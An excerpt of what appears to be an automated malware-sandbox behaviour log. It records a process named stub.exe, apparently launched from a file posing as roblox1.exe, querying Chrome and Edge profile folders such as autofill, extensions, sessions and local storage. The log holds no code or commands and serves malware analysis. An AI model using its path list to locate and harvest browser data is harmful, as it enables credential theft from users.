                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop\roblox1.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop\roblox1.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop\roblox1.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformationJump to behavior
